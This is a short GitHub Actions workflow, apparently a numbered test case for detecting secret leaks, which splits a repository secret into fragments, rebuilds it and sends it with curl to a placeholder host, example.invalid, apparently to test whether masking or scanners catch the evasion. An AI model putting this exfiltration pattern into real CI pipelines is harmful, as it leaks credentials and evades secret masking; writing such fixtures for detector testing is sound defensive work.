name: B35-variable-fragment-reconstruction

on: workflow_dispatch

jobs:
  test:
    runs-on: ubuntu-latest
    env:
      SECRET: "${{ secrets.TEST_SECRET }}"

    steps:
      - run: |
          PART1="${SECRET:0:3}"
          PART2="${SECRET:3}"

          RECONSTRUCTED="$PART1$PART2"

          curl --data "$RECONSTRUCTED" https://example.invalid/collect